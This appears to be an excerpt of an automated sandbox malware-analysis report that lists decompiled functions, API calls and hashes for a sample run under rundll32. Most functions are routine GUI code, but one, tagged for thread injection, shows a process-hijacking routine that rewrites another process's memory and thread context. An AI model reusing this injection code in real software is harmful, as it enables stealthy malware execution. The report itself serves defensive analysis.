                          • Opcode Fuzzy Hash: 754a6649b47e56f59b891558f9b1acddf5366326bb7c4faf121789afd139d264
                          • Instruction Fuzzy Hash: 6A01AD75A44200ABCA41EAA8EC8DF9B33ADA709704F005611FB15D73D0DB26D854CB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282C9F4 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E0282C9F4(intOrPtr* __eax, signed int __edx) {
				void* _t22;
				struct HPALETTE__* _t29;
				struct HPALETTE__* _t30;
				struct HDC__* _t32;
				intOrPtr* _t33;
				void* _t34;
				signed int* _t35;

				_t35 = _t34 + 0xfffffff8;
				 *_t35 = __edx;
				_t33 = __eax;
				_t22 = 0;
				_t36 =  *((char*)(__eax + 0x57));
				if( *((char*)(__eax + 0x57)) != 0) {
					_t29 = E027D3408(__eax, _t36);
					if(_t29 != 0) {
						_t32 =  *((intOrPtr*)( *_t33 + 0x48))();
						asm("sbb eax, eax");
						_t30 = SelectPalette(_t32, _t29,  ~( *_t35 ^ 0x00000001));
						if(RealizePalette(_t32) != 0) {
							 *((intOrPtr*)( *_t33 + 0x7c))();
						}
						SelectPalette(_t32, _t30, 0xffffffff);
						ReleaseDC(_t35[2], _t32);
						_t22 = 1;
					}
				}
				return _t22;
			}










                          0x0282c9f8
                          0x0282c9fb
                          0x0282c9fe
                          0x0282ca00
                          0x0282ca02
                          0x0282ca06
                          0x0282ca13
                          0x0282ca17
                          0x0282ca24
                          0x0282ca2d
                          0x0282ca37
                          0x0282ca41
                          0x0282ca47
                          0x0282ca47
                          0x0282ca4e
                          0x0282ca59
                          0x0282ca5e
                          0x0282ca5e
                          0x0282ca17
                          0x0282ca68

                          APIs
                          • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0282CA32
                          • RealizePalette.GDI32(00000000), ref: 0282CA3A
                          • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0282CA4E
                          • ReleaseDC.USER32(00000000,00000000), ref: 0282CA59
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Palette$Select$RealizeRelease
                          • String ID:
                          • API String ID: 4122334046-0
                          • Opcode ID: bb58b4cd4bebd9edfe325534b157e65b25facd398a44339e2568feb8b0bf4df2
                          • Instruction ID: d87b3b53f7a92b2c878e8911ae4ea188ffeae2eb095947b81f8ed49484c93259
                          • Opcode Fuzzy Hash: bb58b4cd4bebd9edfe325534b157e65b25facd398a44339e2568feb8b0bf4df2
                          • Instruction Fuzzy Hash: 8D01D43A2092542E9712A63D9C088BB7BEDCF83A64B15027CF455C7280DE219C49C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D37E0 Relevance: 6.1, APIs: 4, Instructions: 51threadinjectionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D37E0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;

				_v720.ContextFlags = 0x10002;
				E042D14A0( &(_v720.Dr0), 0, 0x2c8);
				if(GetThreadContext(_a8,  &_v720) != 0) {
					if(WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0) != 0) {
						_v720.Eax = _a16;
						if(SetThreadContext(_a8,  &_v720) != 0) {
							ResumeThread(_a8);
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}




                          0x042d37e9
                          0x042d3801
                          0x042d381c
                          0x042d3840
                          0x042d3849
                          0x042d3862
                          0x042d386c
                          0x00000000
                          0x042d3872
                          0x00000000
                          0x042d3864
                          0x00000000
                          0x042d3842
                          0x00000000

                          APIs
                          • GetThreadContext.KERNEL32(042D1ECF,00010002), ref: 042D3814
                          • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 042D3838
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ContextMemoryProcessThreadWrite
                          • String ID:
                          • API String ID: 2099319263-0
                          • Opcode ID: ce97a4adced3c2ddd13ebfe76369b18465316f8f6cd8e6aad8b4819865b5ca6c
                          • Instruction ID: 94f43bee1bbcde42db271139afc72184de7d89a2b153872d38741518846c3602
                          • Opcode Fuzzy Hash: ce97a4adced3c2ddd13ebfe76369b18465316f8f6cd8e6aad8b4819865b5ca6c
                          • Instruction Fuzzy Hash: AF1184B5B15109ABEB14DF64EC49FBE33B8AB08745F008568FE09D7180E674E940CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D1ABC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E027D1ABC() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E027D1B72);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x28655cc);
				L027D1410();
				if( *0x286504d != 0) {
					_push(0x28655cc);
					L027D1418();
				}
				E027D1480(0x28655ec);
				E027D1480(0x28655fc);
				E027D1480(0x2865628);
				 *0x2865624 = LocalAlloc(0, 0xff8);
				if( *0x2865624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x2865624; // 0x2916550
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x2865610)) = 0x286560c;
					 *0x286560c = 0x286560c;
					 *0x2865618 = 0x286560c;
					 *0x28655c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E027D1B79);
				if( *0x286504d != 0) {
					_push(0x28655cc);
					L027D1420();
					return 0;
				}
				return 0;
			}







                          0x027d1ac1
                          0x027d1ac2
                          0x027d1ac7
                          0x027d1aca
                          0x027d1acd
                          0x027d1ad2
                          0x027d1ade
                          0x027d1ae0
                          0x027d1ae5
                          0x027d1ae5
                          0x027d1aef
                          0x027d1af9
                          0x027d1b03
                          0x027d1b14
                          0x027d1b20
                          0x027d1b22
                          0x027d1b27
                          0x027d1b27
                          0x027d1b2f
                          0x027d1b33
                          0x027d1b34
                          0x027d1b40
                          0x027d1b43
                          0x027d1b45
                          0x027d1b4a
                          0x027d1b4a
                          0x027d1b53
                          0x027d1b56
                          0x027d1b59
                          0x027d1b65
                          0x027d1b67
                          0x027d1b6c
                          0x00000000
                          0x027d1b6c
                          0x027d1b71

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(028655CC,00000000,027D1B72,?,?,027D2356), ref: 027D1AD2
                          • RtlEnterCriticalSection.KERNEL32(028655CC,028655CC,00000000,027D1B72,?,?,027D2356), ref: 027D1AE5
                          • LocalAlloc.KERNEL32(00000000,00000FF8,028655CC,00000000,027D1B72,?,?,027D2356), ref: 027D1B0F
                          • RtlLeaveCriticalSection.KERNEL32(028655CC,027D1B79,00000000,027D1B72,?,?,027D2356), ref: 027D1B6C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                          • String ID:
                          • API String ID: 730355536-0
                          • Opcode ID: 32317aae611a31233dcb041842bfe503e224913980d8f28521350cd8e8518989
                          • Instruction ID: 56d350ca89908718a6a31741da926694b0b79a32b3f07ab732d42bf246a334dd
                          • Opcode Fuzzy Hash: 32317aae611a31233dcb041842bfe503e224913980d8f28521350cd8e8518989
                          • Instruction Fuzzy Hash: D001B5BCA843409EF316ABAC941EB293BE6D749704FC09868E149CB6C1D7BC9450CF65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281CAF4 Relevance: 6.0, APIs: 4, Instructions: 38threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281CAF4() {
				long _v8;
				void* _t3;
				void* _t5;

				_t3 =  *0x2865b58; // 0x41d1544
				if( *((char*)(_t3 + 0xa5)) == 0) {
					if( *0x2865b70 == 0) {
						_t3 = SetWindowsHookExA(3, E0281CAB0, 0, GetCurrentThreadId());
						 *0x2865b70 = _t3;
					}
					if( *0x2865b6c == 0) {
						_t3 = CreateEventA(0, 0, 0, 0);
						 *0x2865b6c = _t3;
					}
					if( *0x2865b74 == 0) {
						_t5 = CreateThread(0, 0x3e8, E0281CA50, 0, 0,  &_v8);
						 *0x2865b74 = _t5;
						return _t5;
					}
				}
				return _t3;
			}






                          0x0281caf8
                          0x0281cb04
                          0x0281cb0d
                          0x0281cb1f
                          0x0281cb24
                          0x0281cb24
                          0x0281cb30
                          0x0281cb3a
                          0x0281cb3f
                          0x0281cb3f
                          0x0281cb4b
                          0x0281cb61
                          0x0281cb66
                          0x00000000
                          0x0281cb66
                          0x0281cb4b
                          0x0281cb6d

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0281CB0F
                          • SetWindowsHookExA.USER32(00000003,0281CAB0,00000000,00000000), ref: 0281CB1F
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0281FAA8), ref: 0281CB3A
                          • CreateThread.KERNEL32(00000000,000003E8,0281CA50,00000000,00000000,?), ref: 0281CB61
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateThread$CurrentEventHookWindows
                          • String ID:
                          • API String ID: 1195359707-0
                          • Opcode ID: b50a81c38729d2c8eaa677257d5ea2e39ac77d3febebec35916f787ce1a41bfc
                          • Instruction ID: 41d86bbe0ca874cf378046d1d5b9b4486ed4dd30e0404666fadd83780f13270f
                          • Opcode Fuzzy Hash: b50a81c38729d2c8eaa677257d5ea2e39ac77d3febebec35916f787ce1a41bfc
                          • Instruction Fuzzy Hash: 41F0FFFCAC4355AEF611EB60AC0AF2536AC9300F11F901556F309DA1C0C7A965548F1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282B48C Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E0282B48C(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x2865ba4; // 0x41d10ac
					if(GlobalFindAtomA(E027D45A8(_t9)) !=  *0x2865ba0) {
						_t16 = 0 | E0282A57C(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x2865ba0 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                          0x0282b48c
                          0x0282b48e
                          0x0282b48f
                          0x0282b491
                          0x0282b495
                          0x0282b4ac
                          0x0282b4c3
                          0x0282b4e3
                          0x0282b4c5
                          0x0282b4d5
                          0x0282b4d5
                          0x0282b4c3
                          0x0282b4eb

                          APIs
                          • GetWindowThreadProcessId.USER32(00000000), ref: 0282B499
                          • GetCurrentProcessId.KERNEL32(00000000,?,?,02865BC0,00000000,0282B504,0282B2C6,02865BD8,00000000,0282B0B6,?,02865BC0,?), ref: 0282B4A2
                          • GlobalFindAtomA.KERNEL32(00000000), ref: 0282B4B7
                          • GetPropA.USER32(00000000,00000000), ref: 0282B4CE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                          • String ID:
                          • API String ID: 2582817389-0
                          • Opcode ID: ea221d03c97d01c4ce849bab76e4be4b34515924221ecdcfbaf30ee521ed8e11
                          • Instruction ID: 8a0d7cd387b4a7abf18a7380e48b547482089aed6fa12df062dc832c92449fb6
                          • Opcode Fuzzy Hash: ea221d03c97d01c4ce849bab76e4be4b34515924221ecdcfbaf30ee521ed8e11
                          • Instruction Fuzzy Hash: 43F0E5AD64B1326B56327775ADC8A7F13ADDE00368BC48421FC44C6041EB24CCD5CAB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281E140 Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281E140(int __eax) {
				int _v8;
				struct HWND__* _v12;
				int _t15;

				_v8 = __eax;
				_t15 = _v8;
				if( *((intOrPtr*)(_t15 + 0x30)) != 0) {
					_t15 = GetLastActivePopup( *(_v8 + 0x30));
					_v12 = _t15;
					if(_v12 != 0) {
						_t15 = _v12;
						if(_t15 !=  *(_v8 + 0x30)) {
							_t15 = IsWindowVisible(_v12);
							if(_t15 != 0) {
								_t15 = IsWindowEnabled(_v12);
								if(_t15 != 0) {
									_t15 = SetForegroundWindow(_v12);
								}
							}
						}
					}
				}
				return _t15;
			}






                          0x0281e146
                          0x0281e149
                          0x0281e150
                          0x0281e159
                          0x0281e15e
                          0x0281e165
                          0x0281e167
                          0x0281e170
                          0x0281e176
                          0x0281e17d
                          0x0281e183
                          0x0281e18a
                          0x0281e190
                          0x0281e190
                          0x0281e18a
                          0x0281e17d
                          0x0281e170
                          0x0281e165
                          0x0281e198

                          APIs
                          • GetLastActivePopup.USER32(00000000), ref: 0281E159
                          • IsWindowVisible.USER32(00000000), ref: 0281E176
                          • IsWindowEnabled.USER32(00000000), ref: 0281E183
                          • SetForegroundWindow.USER32(00000000), ref: 0281E190
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                          • String ID:
                          • API String ID: 2280970139-0
                          • Opcode ID: 418d1c1c4744b93ebb7d3ba8d3e3d2ef3a33544132930ece1c961c045ef27c35
                          • Instruction ID: 9ee65c9a8808e7f9816f5b6eb02c1777ee96550f0dc494cd0b771ca83b444c42
                          • Opcode Fuzzy Hash: 418d1c1c4744b93ebb7d3ba8d3e3d2ef3a33544132930ece1c961c045ef27c35
                          • Instruction Fuzzy Hash: DDF0AF79910208EFDB55DFE9D988A9D7BBEAF04315F540994A904EB281DB34EA80CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282A5B0 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E0282A5B0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x2865ba8; // 0x41d10c8
					if(GlobalFindAtomA(E027D45A8(_t5)) !=  *0x2865ba2) {
						_t15 = E0282A57C(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x2865ba2 & 0x0000ffff);
					}
				}
				return _t15;
			}







                          0x0282a5b0
                          0x0282a5b2
                          0x0282a5b3
                          0x0282a5b5
                          0x0282a5b9
                          0x0282a5d0
                          0x0282a5e7
                          0x0282a602
                          0x0282a5e9
                          0x0282a5f7
                          0x0282a5f7
                          0x0282a5e7
                          0x0282a609

                          APIs
                          • GetWindowThreadProcessId.USER32(?), ref: 0282A5BD
                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,028272D1,00000000,02826E34,?,00000000,028175E4,00000000), ref: 0282A5C6
                          • GlobalFindAtomA.KERNEL32(00000000), ref: 0282A5DB
                          • GetPropA.USER32(?,00000000), ref: 0282A5F2
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                          • String ID:
                          • API String ID: 2582817389-0
                          • Opcode ID: b38c653446cd32a3e7655dff8a212e28da4ca95193f3d6d1f97166c65a2b0071
                          • Instruction ID: 9fb45feaccd7c8d078e8547fd519a587d387a7077b01fd0a4acb68a1cb91f773
                          • Opcode Fuzzy Hash: b38c653446cd32a3e7655dff8a212e28da4ca95193f3d6d1f97166c65a2b0071
                          • Instruction Fuzzy Hash: DBF0E5EE6001316ECA35B7BAADCC83761EDDF042A13000920F945C3642D728CCC48B70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D6F2A Relevance: 6.0, APIs: 4, Instructions: 12memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D6F2A(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                          0x027d6f2f
                          0x027d6f36
                          0x027d6f3b
                          0x027d6f41
                          0x027d6f46

                          APIs
                          • GlobalHandle.KERNEL32 ref: 027D6F2F
                          • GlobalUnWire.KERNEL32(00000000), ref: 027D6F36
                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 027D6F3B
                          • GlobalFix.KERNEL32(00000000), ref: 027D6F41
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Global$AllocHandleWire
                          • String ID:
                          • API String ID: 2210401237-0
                          • Opcode ID: 86b46a5ab506f311bf0838b411388cf6acfae71a8e913e3811583851ae27973b
                          • Instruction ID: ae5a3b484a4af6d00b35201216cdf5d141fe5b95c63de9558a066671b91462cd
                          • Opcode Fuzzy Hash: 86b46a5ab506f311bf0838b411388cf6acfae71a8e913e3811583851ae27973b
                          • Instruction Fuzzy Hash: ADB009CCA103417DAE0673B46D0DD3B057EDDA5B44391499A3808E2041EA6EEC000C3A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F74EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E027F74EC(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x27f7675);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(0x27f767c);
					return E027D410C( &_v80, 3);
				} else {
					_t76 =  *0x2865914; // 0x41d0a30
					E027F6830(_t76);
					_push(_t137);
					_push(0x27f764d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E027D434C( &_v72, _v8 + 0x1b);
						if(E027D8338(_v72, "Default") != 0) {
							E027D434C( &_v80, _v8 + 0x1b);
							E027D8C20( &(_v68.lfFaceName), _v80);
						} else {
							E027D434C( &_v76, "\rMS Sans Serif");
							E027D8C20( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E027F77D0(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x27f7654);
					_t81 =  *0x2865914; // 0x41d0a30
					return E027F683C(_t81);
				}
			}
















                          0x027f74ed
                          0x027f74ef
                          0x027f74f5
                          0x027f74f8
                          0x027f74fb
                          0x027f74fe
                          0x027f7502
                          0x027f7503
                          0x027f7508
                          0x027f750b
                          0x027f7511
                          0x027f751b
                          0x027f765f
                          0x027f7662
                          0x027f7674
                          0x027f7521
                          0x027f7521
                          0x027f7526
                          0x027f752d
                          0x027f752e
                          0x027f7533
                          0x027f7536
                          0x027f7540
                          0x027f754c
                          0x027f7551
                          0x027f7556
                          0x027f755b
                          0x027f7565
                          0x027f7570
                          0x027f7567
                          0x027f7567
                          0x027f7567
                          0x027f7581
                          0x027f758e
                          0x027f759b
                          0x027f75a4
                          0x027f75b0
                          0x027f75c4
                          0x027f75e9
                          0x027f75f4
                          0x027f75c6
                          0x027f75ce
                          0x027f75d9
                          0x027f75d9
                          0x027f75f9
                          0x027f75fd
                          0x027f7601
                          0x027f760c
                          0x027f760e
                          0x027f7616
                          0x027f7610
                          0x027f7612
                          0x027f761c
                          0x027f7614
                          0x027f7622
                          0x027f7622
                          0x027f7612
                          0x027f7632
                          0x027f7632
                          0x027f7637
                          0x027f763a
                          0x027f763d
                          0x027f7642
                          0x027f764c
                          0x027f764c

                          APIs
                            • Part of subcall function 027F6830: RtlEnterCriticalSection.KERNEL32(?,027F686D), ref: 027F6834
                          • CreateFontIndirectA.GDI32(?), ref: 027F762A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateCriticalEnterFontIndirectSection
                          • String ID: MS Sans Serif$Default
                          • API String ID: 2931345757-2137701257
                          • Opcode ID: aa65887423d7086f01e0f7d030e6c96b0315d7e09d895f68b8dac27c2d015549
                          • Instruction ID: b6619eddc27898aaa4066778fbd0ed8a3f070954cb140880093f959dc18fb247
                          • Opcode Fuzzy Hash: aa65887423d7086f01e0f7d030e6c96b0315d7e09d895f68b8dac27c2d015549
                          • Instruction Fuzzy Hash: 67515670A08288DFDB45CFA8D989BDDFBF6AF48304F6580A9D904A7352D3749E05CB25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02826A78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E02826A78(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x2865b88; // 0x41d1e78
					E027FED14(_t34,  &_v24);
					_push(_t69);
					_push(0x2826b76);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0282677C(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x2826b7d);
							_t40 =  *0x2865b88; // 0x41d1e78
							return E027FED0C(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x2865b88; // 0x41d1e78
					E027FED14(_t42,  &_v8);
					_push(_t69);
					_push(0x2826b4b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E02826924( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x2826b52);
					_t48 =  *0x2865b88; // 0x41d1e78
					return E027FED0C(_t48);
				}
				L14:
			}


















                          0x02826a79
                          0x02826a7b
                          0x02826a7f
                          0x02826a81
                          0x02826a8b
                          0x02826a94
                          0x02826b93
                          0x02826a9a
                          0x02826aa4
                          0x02826aa6
                          0x02826aa6
                          0x02826ab6
                          0x02826ab8
                          0x02826ab8
                          0x02826ac2
                          0x02826ac4
                          0x02826ac4
                          0x02826ad0
                          0x02826ad6
                          0x02826adb
                          0x02826ae2
                          0x02826ae3
                          0x02826ae8
                          0x02826aeb
                          0x02826aee
                          0x02826aee
                          0x02826b00
                          0x02826b07
                          0x00000000
                          0x00000000
                          0x02826b56
                          0x02826b60
                          0x02826b63
                          0x02826b66
                          0x02826b6b
                          0x02826b75
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x02826b56
                          0x02826b0c
                          0x02826b11
                          0x02826b18
                          0x02826b19
                          0x02826b1e
                          0x02826b21
                          0x02826b30
                          0x02826b35
                          0x02826b38
                          0x02826b3b
                          0x02826b40
                          0x02826b4a
                          0x02826b4a
                          0x00000000

